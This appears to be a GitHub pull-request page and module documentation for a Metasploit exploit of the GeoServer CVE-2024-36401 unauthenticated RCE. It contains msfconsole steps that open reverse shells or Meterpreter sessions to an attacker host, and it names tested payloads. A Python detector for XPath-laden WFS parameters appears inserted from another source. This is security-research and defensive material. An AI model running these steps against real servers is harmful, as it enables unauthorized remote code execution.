GeoServer unauthenticated RCE [CVE-2024-36401] #19311
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
Hey @h00die-gr3y, thanks for another great module and for adding the docs. I hope you don't mind me adding Windows support in 5d210b5. I saw the Windows installer and figured I'd take a crack at exploiting it. Let me know what you think of the addition. So far everything looks good. I'll take another look tomorrow. Testing was as expected on both operating systems I tested.

Testing

Docker vulhub/geoserver:2.23.2
Windows 10 GeoServer 2.25.0

Side note

I tried getting a Windows command stager target working for parity's sake, although staged and stageless Meterpreter payloads both ended up failing. The staged payload failed because not all of the payload ends up getting base64 encoded and it runs into a parsing error.

And I think the stageless Meterpreter payload is just too large:
@jheysel-r7 Thanks for the Windows addition. Quickly checked it on my Windows Server 2022 Standard installation.
@h00die-gr3y thanks for testing the Windows target so quickly. Teamwork makes the exploits work :)
I've added a couple more minor comments but other than those this looks like it's ready to be landed.
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Release Notes

This adds an exploit module for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions prior to 2.23.6, between versions 2.24.0 and 2.24.3, and in versions 2.25.0 and 2.25.1.
Hey @jheysel-r7, @h00die-gr3y, @cgranleese-r7! I noticed that the Metasploit module for CVE-2024-36401 might not work if the expected FeatureTypes are deleted or replaced with custom ones. My exploit handles this by allowing custom FeatureTypes to be used, ensuring it still works. You can check out my code here for inspiration: https://github.com/Chocapikk/CVE-2024-36401/blob/main/exploit.py#L117 . In short, it just grabs all the FeatureTypes without filtering as in the module. Improving the module to dynamically detect and validate available FeatureTypes could make it more robust. cc: @wvu
@Chocapikk,
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In GeoServer versions prior to 2.23.6, between versions 2.24.0 and 2.24.3, and in versions 2.25.0 and 2.25.1, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation, due to unsafely evaluating property names as XPath expressions. An attacker can abuse this by sending a POST request with a malicious XPath expression to execute arbitrary commands as root on the system.
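As an added defender-side example, not code from the module or its documentation: a small Python helper that checks a GeoServer version string against the affected ranges listed above, and scans request targets (the KVP/GET form of WFS requests) for propertyName / valueReference values that are XPath expressions rather than plain property names, which is the unsafe evaluation the description points at. The parameter list, the name grammar and the sample requests are constructed assumptions for this example; XML POST bodies carry the same parameters as elements and are not parsed here.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Affected ranges exactly as the module description states them:
# prior to 2.23.6, 2.24.0 through 2.24.3, and 2.25.0 / 2.25.1.
def is_affected_version(version):
    """True when a GeoServer version string falls inside the listed ranges."""
    v = tuple(int(x) for x in version.split("."))
    if v < (2, 23, 6):
        return True
    if (2, 24, 0) <= v <= (2, 24, 3):
        return True
    return v in ((2, 25, 0), (2, 25, 1))

# WFS parameters that carry property names (assumption for this example).
PROPERTY_PARAMS = {"propertyname", "valuereference"}
# A legitimate property name is a plain, optionally prefixed XML name or an
# '@'-attribute ("gml:name", "the_geom", "@id"). Parentheses, slashes or quotes
# mean the value is an XPath expression, which is what the bug evaluates.
PLAIN_NAME = re.compile(r"^@?(?:[A-Za-z_][\w.\-]*:)?[A-Za-z_][\w.\-]*$")
# WFS 1.x allows per-typeName groups: propertyName=(a,b)(c)
GROUPED = re.compile(r"^(?:\([^()]*\))+$")

def _names(value):
    if GROUPED.match(value):
        value = ",".join(re.findall(r"\(([^()]*)\)", value))
    return [n.strip() for n in value.split(",") if n.strip()]

def suspicious_property_names(request_target):
    """Return the property-name values in one request target that are not plain names."""
    hits = []
    for key, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        if key.lower() in PROPERTY_PARAMS:
            hits += [n for n in _names(value) if not PLAIN_NAME.match(n)]
    return hits

# Constructed request targets standing in for access-log entries (not real traffic).
SAMPLE_REQUESTS = [
    "/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
    "&typeNames=sf:archsites&valueReference=gml:name",
    "/geoserver/wfs?service=WFS&version=1.1.0&request=GetFeature"
    "&typeName=sf:archsites&propertyName=(the_geom,cat)",
    "/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
    "&typeNames=sf:archsites&valueReference=count(//gml:name)",
]

def scan(requests):
    """Map each request target to its suspicious values, keeping only those with hits."""
    flagged = {r: suspicious_property_names(r) for r in requests}
    return {r: v for r, v in flagged.items() if v}
```

Only the third constructed request is flagged: a bare function call in valueReference is not a property name, while the grouped WFS 1.1 form `(the_geom,cat)` is accepted.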
The following GeoServer releases are tested:
Osgeo.org Docker releases with Tomcat
Vulhub Docker releases with Jetty
Linux binary installs with Jetty
Installation steps to install the GeoServer web application
docker compose up -d
http://your_ip:8080/geoserver. You are ready to test the module.
Verification Steps
msfconsole
use exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
set rhosts <ip-target>
set rport <port>
set lhost <attacker-ip>
set target <0=Unix Command, 1=Linux Dropper>
exploit
You should get a reverse shell or Meterpreter session depending on the payload and target settings.

Scenarios
GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash
GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash
GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash
GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp
GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp
GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp
Limitations
No limitations.